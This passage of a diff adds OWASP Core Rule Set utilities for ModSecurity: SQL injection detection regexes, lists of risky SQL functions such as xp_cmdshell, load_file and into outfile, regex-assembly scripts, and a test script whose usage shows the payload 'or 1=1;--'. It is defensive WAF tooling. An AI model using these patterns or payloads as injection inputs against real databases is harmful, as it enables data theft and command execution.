+[\"'`][\%&<>^=]+\d\s*?=
+[\"'`][\%&<>^=]+\d\s*?or
+[\"'`][\%&<>^=]+\d\s*?xor
+[\"'`][\%&<>^=]+\d\s*?div
+[\"'`][\%&<>^=]+\d\s*?like
+[\"'`][\%&<>^=]+\d\s*?between
+[\"'`][\%&<>^=]+\d\s*?and
+[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`]
+[\"'`]\s*?is\s*?\d.+[\"'`]?\w
+[\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`]
+[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data
new file mode 100644
index 000000000..fb60a831f
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data
@@ -0,0 +1,11 @@
+create\s+function\s+.+\s+returns
+;\s*?alter\b\s*?[\[(]?\w{2,}
+;\s*?create\b\s*?[\[(]?\w{2,}
+;\s*?delete\b\s*?[\[(]?\w{2,}
+;\s*?desc\b\s*?[\[(]?\w{2,}
+;\s*?insert\b\s*?[\[(]?\w{2,}
+;\s*?load\b\s*?[\[(]?\w{2,}
+;\s*?rename\b\s*?[\[(]?\w{2,}
+;\s*?select\b\s*?[\[(]?\w{2,}
+;\s*?truncate\b\s*?[\[(]?\w{2,}
+;\s*?update\b\s*?[\[(]?\w{2,}
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data
new file mode 100644
index 000000000..177c18fdf
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data 
@@ -0,0 +1,134 @@
+alter\s+char\s?[(]?
+alter\s+group_concat\s?[(]?
+alter\s+load_file\s?[(]?
+create\s+char\s?[(]?
+create\s+group_concat\s?[(]?
+create\s+load_file\s?[(]?
+delete\s+char\s?[(]?
+delete\s+group_concat\s?[(]?
+delete\s+load_file\s?[(]?
+desc\s+char\s?[(]?
+desc\s+group_concat\s?[(]?
+desc\s+load_file\s?[(]?
+insert\s+char\s?[(]?
+insert\s+group_concat\s?[(]?
+insert\s+load_file\s?[(]?
+load\s+char\s?[(]?
+load\s+group_concat\s?[(]?
+load\s+load_file\s?[(]?
+rename\s+char\s?[(]?
+rename\s+group_concat\s?[(]?
+rename\s+load_file\s?[(]?
+select\s+char\s?[(]?
+select\s+group_concat\s?[(]?
+select\s+load_file\s?[(]?
+truncate\s+char\s?[(]?
+truncate\s+group_concat\s?[(]?
+truncate\s+load_file\s?[(]?
+update\s+char\s?[(]?
+update\s+group_concat\s?[(]?
+update\s+load_file\s?[(]?
+end\s*?\);
+[\s(]load_file\s*?\(
+[\"'`]\s+regexp\W
+[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom
+^[\W\d]+\s*?create\s+\w+
+^[\W\d]+\s*?delete\b
+^[\W\d]+\s*?desc\b
+^[\W\d]+\s*?insert\b
+^[\W\d]+\s*?load\b
+^[\W\d]+\s*?rename\b
+^[\W\d]+\s*?select\b
+^[\W\d]+\s*?truncate\b
+^[\W\d]+\s*?update\b
+^[\W\d]+\s*?alter\s*aggregate\b
+^[\W\d]+\s*?alter\s*application\s*role\b
+^[\W\d]+\s*?alter\s*assembly\b
+^[\W\d]+\s*?alter\s*asymmetric\s*key\b
+^[\W\d]+\s*?alter\s*audit\b
+^[\W\d]+\s*?alter\s*authorization\b
+^[\W\d]+\s*?alter\s*availability\s*group\b
+^[\W\d]+\s*?alter\s*broker\s*priority\b
+^[\W\d]+\s*?alter\s*bufferpool\b
+^[\W\d]+\s*?alter\s*certificate\b
+^[\W\d]+\s*?alter\s*cluster\b
+^[\W\d]+\s*?alter\s*collation\b
+^[\W\d]+\s*?alter\s*column\b
+^[\W\d]+\s*?alter\s*conversion\b
+^[\W\d]+\s*?alter\s*credential\b
+^[\W\d]+\s*?alter\s*cryptographic\s*provider\b
+^[\W\d]+\s*?alter\s*database\b
+^[\W\d]+\s*?alter\s*default\b
+^[\W\d]+\s*?alter\s*dimension\b
+^[\W\d]+\s*?alter\s*diskgroup\b
+^[\W\d]+\s*?alter\s*domain\b
+^[\W\d]+\s*?alter\s*endpoint\b
+^[\W\d]+\s*?alter\s*extension\b
+^[\W\d]+\s*?alter\s*external\b
+^[\W\d]+\s*?alter\s*event\b
+^[\W\d]+\s*?alter\s*flashback\b
+^[\W\d]+\s*?alter\s*foreign\b
+^[\W\d]+\s*?alter\s*fulltext\b
+^[\W\d]+\s*?alter\s*function\b
+^[\W\d]+\s*?alter\s*hierarchy\b
+^[\W\d]+\s*?alter\s*group\b
+^[\W\d]+\s*?alter\s*histogram\b
+^[\W\d]+\s*?alter\s*index\b
+^[\W\d]+\s*?alter\s*indextype\b
+^[\W\d]+\s*?alter\s*inmemory\b
+^[\W\d]+\s*?alter\s*instance\b
+^[\W\d]+\s*?alter\s*java\b
+^[\W\d]+\s*?alter\s*language\b
+^[\W\d]+\s*?alter\s*large\b
+^[\W\d]+\s*?alter\s*library\b
+^[\W\d]+\s*?alter\s*lockdown\b
+^[\W\d]+\s*?alter\s*logfile\s*group\b
+^[\W\d]+\s*?alter\s*login\b
+^[\W\d]+\s*?alter\s*mask\b
+^[\W\d]+\s*?alter\s*master\s*key\b
+^[\W\d]+\s*?alter\s*materialized\b
+^[\W\d]+\s*?alter\s*message\s*type\b
+^[\W\d]+\s*?alter\s*method\b
+^[\W\d]+\s*?alter\s*module\b
+^[\W\d]+\s*?alter\s*nickname\b
+^[\W\d]+\s*?alter\s*operator\b
+^[\W\d]+\s*?alter\s*outline\b
+^[\W\d]+\s*?alter\s*package\b
+^[\W\d]+\s*?alter\s*partition\b
+^[\W\d]+\s*?alter\s*permission\b
+^[\W\d]+\s*?alter\s*procedure\b
+^[\W\d]+\s*?alter\s*profile\b
+^[\W\d]+\s*?alter\s*queue\b
+^[\W\d]+\s*?alter\s*remote\b
+^[\W\d]+\s*?alter\s*resource\b
+^[\W\d]+\s*?alter\s*role\b
+^[\W\d]+\s*?alter\s*rollback\b
+^[\W\d]+\s*?alter\s*route\b
+^[\W\d]+\s*?alter\s*schema\b
+^[\W\d]+\s*?alter\s*search\b
+^[\W\d]+\s*?alter\s*security\b
+^[\W\d]+\s*?alter\s*server\b
+^[\W\d]+\s*?alter\s*service\b
+^[\W\d]+\s*?alter\s*sequence\b
+^[\W\d]+\s*?alter\s*session\b
+^[\W\d]+\s*?alter\s*symmetric\s*key\b
+^[\W\d]+\s*?alter\s*synonym\b
+^[\W\d]+\s*?alter\s*stogroup\b
+^[\W\d]+\s*?alter\s*table\b
+^[\W\d]+\s*?alter\s*tablespace\b
+^[\W\d]+\s*?alter\s*text\b
+^[\W\d]+\s*?alter\s*threshold\b
+^[\W\d]+\s*?alter\s*trigger\b
+^[\W\d]+\s*?alter\s*trusted\b
+^[\W\d]+\s*?alter\s*type\b
+^[\W\d]+\s*?alter\s*usage\b
+^[\W\d]+\s*?alter\s*user\b
+^[\W\d]+\s*?alter\s*view\b
+^[\W\d]+\s*?alter\s*work\b
+^[\W\d]+\s*?alter\s*workload\b
+^[\W\d]+\s*?alter\s*wrapper\b
+^[\W\d]+\s*?alter\s*xml\s*schema\b
+^[\W\d]+\s*?alter\s*xsrobject\b
+^[\W\d]+\s*?union\s*all\b
+^[\W\d]+\s*?union\s*select\b
+^[\W\d]+\s*?union\s*distinct\b
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data
new file mode 100644
index 000000000..7edf306c0
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data
@@ -0,0 +1,19 @@
+[\"'`]\s*?\*.+or\W*?[\"'`]\d
+[\"'`]\s*?\*.+xor\W*?[\"'`]\d
+[\"'`]\s*?\*.+div\W*?[\"'`]\d
+[\"'`]\s*?\*.+like\W*?[\"'`]\d
+[\"'`]\s*?\*.+between\W*?[\"'`]\d
+[\"'`]\s*?\*.+and\W*?[\"'`]\d
+[\"'`]\s*?\*.+id\W*?[\"'`]\d
+\^[\"'`]
+[\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`]
+[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?#
+[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?--
+[\"'`].*?\*\s*?\d
+[\"'`]\s*?or\s[^\d]+[\w-]+.*?\d
+[\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d
+[\"'`]\s*?div\s[^\d]+[\w-]+.*?\d
+[\"'`]\s*?like\s[^\d]+[\w-]+.*?\d
+[\"'`]\s*?between\s[^\d]+[\w-]+.*?\d
+[\"'`]\s*?and\s[^\d]+[\w-]+.*?\d
+[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data
new file mode 100644
index 000000000..da4a07cf4
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data
@@ -0,0 +1,19 @@
+\b(?i:having)\b\s+\d{1,10}\s*?[=<>]
+\b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>]
+(?i:\bexecute\()
+(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3})
+\bhaving\b ?\d{1,10} ?[=<>]+
+\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+
+(?i:\bcreate\s+?table.{0,20}?\()
+(?i:\blike\W*?char\W*?\()
+(?i:select.*?case)
+(?i:from.*?limit)
+(?i:order\sby)
+exists\s\sselect
+exists\sselect\Sif\s\(
+exists\sselect\Sifnull\s\(
+exists\sselect\Stop
+exists\sselect\Sconcat
+exists\ssystem\s\(
+exists\s\b(?i:having)\b\s+\d{1,10}
+exists\s'[^=]{1,10}'
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data
new file mode 100644
index 000000000..4fff94b43
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data
@@ -0,0 +1,12 @@
+(?i:\bor\b ?\d{1,10} ?[=<>]+)
+(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+)
+(?i:'\s+or\s+.{1,20}[+\-!<>=])
+(?i:'\s+xor\s+.{1,20}[+\-!<>=])
+\b(?i:or)\b\s+\d{1,10}
+\b(?i:or)\b\s+'[^=]{1,10}'
+\b(?i:xor)\b\s+\d{1,10}
+\b(?i:xor)\b\s+'[^=]{1,10}'
+\b(?i:or)\b\s+\d{1,10}\s*?[=<>]
+\b(?i:xor)\b\s+\d{1,10}\s*?[=<>]
+\b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>]
+\b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data
new file mode 100644
index 000000000..45b39f171
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data
@@ -0,0 +1,6 @@
+\band\b\s+\d{1,10}\s*?[=<>]
+\band\b\s+'[^=]{1,10}'\s*?[=<>]
+\band\b\s+\d{1,10}
+\band\b\s+'[^=]{1,10}'
+\band\b ?\d{1,10} ?[=<>]+
+\band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data
new file mode 100644
index 000000000..62a5bb593
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data
@@ -0,0 +1,239 @@
+abs
+acos
+adddate
+addtime
+aes_decrypt
+aes_encrypt
+asin
+ascii
+asciistr
+atan
+atan2
+avg
+benchmark
+bin
+bin_to_num
+bit_and
+bit_count
+bit_length
+bit_or
+bit_xor
+cast
+char
+character_length
+char_length
+charset
+chr
+ciel
+cieling
+coalesce
+coercibility
+compress
+concat
+concat_ws
+connection_id
+conv
+convert
+convert_tz
+cos
+cot
+count
+cr32
+curdate
+current_date
+current_time
+current_timestamp
+current_user
+curtime
+database
+date
+date_add
+datediff
+date_format
+date_sub
+day
+dayname
+dayofmonth
+dayofweek
+dayofyear
+dcount
+decode
+default
+degrees
+des_decrypt
+des_encrypt
+dump
+elt
+encode
+encrypt
+exp
+export_set
+extract
+extractvalue
+field
+field_in_set
+find_in_set
+floor
+format
+found_rows
+from_base64
+from_days
+from_unixtime
+get_format
+get_lock
+greatest
+group_concat
+hex
+hextoraw
+hour
+if
+ifnull
+in
+inet6_aton
+inet6_ntoa
+inet_aton
+inet_ntoa
+insert
+instr
+interval
+is
+is_free_lock
+is_ipv4
+is_ipv4_compat
+is_ipv4_mapped
+is_ipv6
+is_not
+is_not_null
+isnull
+is_null
+is_used_lock
+last
+last_day
+last_insert_id
+lcase
+least
+left
+length
+ln
+load_file
+local
+localtimestamp
+locate
+log
+log10
+log2
+lower
+lpad
+ltrim
+makedate
+make_set
+master_pos_wait
+max
+md5
+microsecond
+mid
+min
+minute
+mod
+month
+monthname
+name_const
+not_in
+now
+nullif
+oct
+octet_length
+old_password
+ord
+password
+period_add
+period_diff
+pg_sleep
+pi
+position
+pow
+power
+procedure_analyse
+quarter
+quote
+radians
+rand
+rawtohex
+rawtonhex
+rawtonhextoraw
+release_lock
+repeat
+replace
+reverse
+right
+round
+row_count
+rpad
+rtrim
+schema
+second
+sec_to_time
+session_user
+sha
+sha1
+sha2
+sign
+sin
+sleep
+soundex
+space
+sqrt
+std
+stddev
+stddev_pop
+stddev_samp
+strcmp
+str_to_date
+subdate
+substr
+substring
+substring_index
+subtime
+sum
+sysdate
+system_user
+tan
+time
+timediff
+time_format
+timestamp
+timestampadd
+timestampdiff
+time_to_sec
+to_base64
+to_char
+to_days
+to_nchar
+to_seconds
+trim
+truncate
+ucase
+uncompress
+uncompressed_length
+unhex
+unix_timestamp
+updatexml
+upper
+user
+utc_date
+utc_time
+utc_timestamp
+uuid
+uuid_short
+values
+variance
+var_pop
+var_samp
+version
+week
+weekday
+weekofyear
+weight_string
+xmltype
+year
+yearweek
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data
new file mode 100644
index 000000000..ad69d1adb
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data
@@ -0,0 +1,45 @@
+autonomous_transaction
+dba_users
+dbms_java
+nvarchar
+openowa_util
+openquery
+openrowset
+sp_addextendedproc
+sp_execute
+sp_executesql
+sp_help
+sp_is_srvrolemember
+sp_makewebtask
+sp_oacreate
+sp_password
+sp_prepare
+sp_replwritetovarbin
+sp_sqlexec
+sql_longvarchar
+sql_variant
+tbcreator
+utl_file
+utl_http
+varchar
+xp_availablemedia
+xp_cmdshell
+xp_dirtree
+xp_enumdsn
+xp_execresultset
+xp_filelist
+xp_loginconfig
+xp_makecab
+xp_ntsec
+xp_ntsec_enumdomains
+xp_regaddmultistring
+xp_regdeletekey
+xp_regdeletevalue
+xp_regenumkeys
+xp_regenumvalues
+xp_regread
+xp_regremovemultistring
+xp_regwrite
+xp_servicecontrol
+xp_terminate
+xp_terminate_process
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data
new file mode 100644
index 000000000..b34a23adc
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data
@@ -0,0 +1,29 @@
+\bdbms_\w+\.\b
+\bdelete\b\W*?\bfrom\b
+\bgroup\b.*?\bby\b.{1,100}?\bhaving\b
+\binner\b\W*?\bjoin\b
+\binsert\b\W*?\binto\b
+\binto\b\W*?\bdumpfile\b
+\binto\b\W*?\boutfile\b
+\bload\b\W*?\bdata\b.*?\binfile\b
+\bprint\b\W*?\@\@
+\bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b
+\bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b
+\bselect\b.{1,100}?\bdata_type\b
+\bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b
+\bselect\b.{1,100}?\binstr\b
+\bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b
+\bselect\b.{1,100}?\bto_char\b
+\bselect\b.{1,100}?\bto_number\b
+\bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b
+\bsys_context\b
+\bunion\b.{1,100}?\bselect\b
+\butl_inaddr\b
+collation\W*?\(a\b
+'dbo'
+'msdasql'
+'sa'
+'sqloledb'
+\@\@version\b
+;\W*?\bdrop\b
+;\W*?\bshutdown\b
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl
new file mode 100755
index 000000000..cb0e67730
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl
@@ -0,0 +1,29 @@
+#!/usr/bin/env perl
+#
+# Create one regexp from a set of regexps.
+# Regexps can be submitted via standard input, one per line.
+#
+# Requires Regexp::Assemble Perl module.
+# To install: cpan install Regexp::Assemble
+#
+# See: https://coreruleset.org/20190826/optimizing-regular-expressions/
+#
+
+use strict;
+use Regexp::Assemble;
+
+my $ra = Regexp::Assemble->new;
+while (<>)
+{
+ # Handle possessive qualifiers
+ # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717
+ my $arr = $ra->lexstr($_);
+ for (my $n = 0; $n < $#$arr - 1; ++$n)
+ {
+ if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') {
+ $arr->[$n] .= splice(@$arr, $n + 1, 1);
+ }
+ }
+ $ra->insert(@$arr);
+}
+print $ra->as_string() . "\n";
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl
new file mode 100755
index 000000000..a74b530f1
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl
@@ -0,0 +1,20 @@
+#!/usr/bin/env perl
+#
+# Create one regexp from a set of regexps.
+# Regexps can be submitted via standard input, one per line.
+#
+# Requires Regexp::Assemble Perl module.
+# To install: cpan install Regexp::Assemble
+#
+# See: https://coreruleset.org/20190826/optimizing-regular-expressions/
+#
+
+use strict;
+use Regexp::Assemble;
+
+my $ra = Regexp::Assemble->new;
+while (<>)
+{
+ $ra->add($_);
+}
+print $ra->as_string() . "\n";
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py
new file mode 100755
index 000000000..818997011
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py
@@ -0,0 +1,64 @@ +#!/usr/bin/env python +# +# Convert a word list to a list of regexps usable by Regexp::Assemble. +# +# Examples: +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Refer to rule 932100, 932110, 932150 for documentation. +# + +import fileinput, string, sys + +# Convert a single line to regexp format, and insert anti-cmdline +# evasions between characters. +def regexp_str(str, evasion): + # By convention, if the line starts with ' char, copy the rest + # verbatim. + if str[0] == "'": + return str[1:] + + result = '' + for i, char in enumerate(str): + if i > 0: + result += evasion + result += regexp_char(char, evasion) + + return result + +# Ensure that some special characters are escaped +def regexp_char(char, evasion): + char = str.replace(char, '.', '\.') + char = str.replace(char, '-', '\-') + char = str.replace(char, '+', r'''(?:\s|<|>).*''') + # Unix: "cat foo", "catfoo" + char = str.replace(char, '@', r'''(?:[\s,;]|\.|/|<|>).*''') + # Windows: "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + char = str.replace(char, ' ', '\s+') + # Ensure multiple spaces are matched + return char + +# Insert these sequences between characters to prevent evasion. +# This emulates the relevant parts of t:cmdLine. +evasions = { + 'unix': r'''[\\\\'\"]*''', + 'windows': r'''[\"\^]*''', +} + +# Parse arguments +if len(sys.argv) <= 1 or not sys.argv[1] in evasions: + print(sys.argv[0] + ' unix|windows [infile]') + sys.exit(1) + +evasion = evasions[sys.argv[1]] +del sys.argv[1] + +# Process lines from input file, or if not specified, standard input +for line in fileinput.input(): + line = line.rstrip('\n ') + line = line.split('#')[0] + if line != '': + print(regexp_str(line, evasion)) 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py
new file mode 100644
index 000000000..8669f94b9
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py
@@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-prefix-from-a-set-of-similar-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + 
"]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh b/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh new file mode 100755 index 000000000..b769a930d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh 
@@ -0,0 +1,170 @@
+#!/bin/bash
+#
+# Script to post a payload against a local webserver at each paranoia level.
+#
+# Note: Webserver has to be prepared to take desired PL as Request Header "PL".
+#
+# WARNING: Setting the paranoia level using a header without proper
+# authentication and authorization is extremely dangerous, and is not
+# recommended for production.
+#
+# Check how to use the Christian Folini's Apache access log format at:
+# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/
+#
+# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \
+# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \
+# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \
+# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \
+# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \
+# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended
+#
+# This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in
+# the access log, if this does not match your LogFormat the script won't work
+# For better results set the SecDefaultAction to 'pass'.
+#
+# The anomaly score envvar can be set as follows:
+# SecAction "id:90101,phase:5,pass,nolog,\
+# setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}"
+#
+# Sample rule to setup the PL dynamically from localhost"
+# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \
+# "id:90102,phase:1,pass,capture,log,auditlog,\
+# msg:'Setting engine to PL%{matched_var}',chain"
+# SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \
+# "setvar:'tx.executing_paranoia_level=%{matched_var}'"
+
+# Path to CRS rule set and local files
+CRS="/usr/share/modsecurity-crs/rules"
+accesslog="/apache/logs/access.log"
+errorlog="/apache/logs/error.log"
+URL="localhost:40080"
+protocol="http"
+while [[ $# > 0 ]]
+do
+ case "$1" in
+ -c|--crs)
+ CRS="$2"
+ shift
+ ;;
+ -a|--access)
+ accesslog="$2"
+ shift
+ ;;
+ -e|--error)
+ errorlog="$2"
+ shift
+ ;;
+ -u|--url)
+ URL="$2"
+ shift
+ ;;
+ -r|--resolve)
+ resolve="$2"
+ resolve="--resolve $resolve"
+ shift
+ ;;
+ --protocol)
+ protocol="$2"
+ shift
+ ;;
+ -P|--payload)
+ PAYLOAD="$2"
+ shift
+ ;;
+ -h|--help)
+ echo "Usage:"
+ echo " --access \"/apache/logs/access.log\""
+ echo " --error \"/apache/logs/error.log\""
+ echo " --url \"localhost:40080\""
+ echo " --resolve \"someservername:40080:localhost\""
+ echo " --protocol \"https\""
+ echo " --payload \"/tmp/payload\""
+ echo " --help"
+ exit 1
+ ;;
+ esac
+ shift
+done
+
+echo "Using CRS: $CRS"
+echo "Using accesslog: $accesslog"
+echo "Using errorlog: $errorlog"
+echo "Using URL: $URL"
+echo "Using protocol: $protocol"
+
+if [ -z "${PAYLOAD+x}" ]; then
+ echo "Please submit valid payload file as parameter. This is fatal. Aborting."
+ $0 -h
+ echo "Examples:"
+ echo " ./send-payload-pls.sh -a /logs/test/access.log \
+ -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
+ --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128"
+ echo " ./send-payload-pls.sh -a /logs/test/access.log \
+ -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
+ --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128"
+ exit 1
+fi
+
+# URL of web server
+
+# Rules per Paranoia level
+# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1
+# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1
+PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
+
+# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2
+# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2
+PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
+
+# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3
+# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3
+PL3=$(awk "/016,phase:2/,/017,phase:1/" $CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
+
+# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4
+# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4
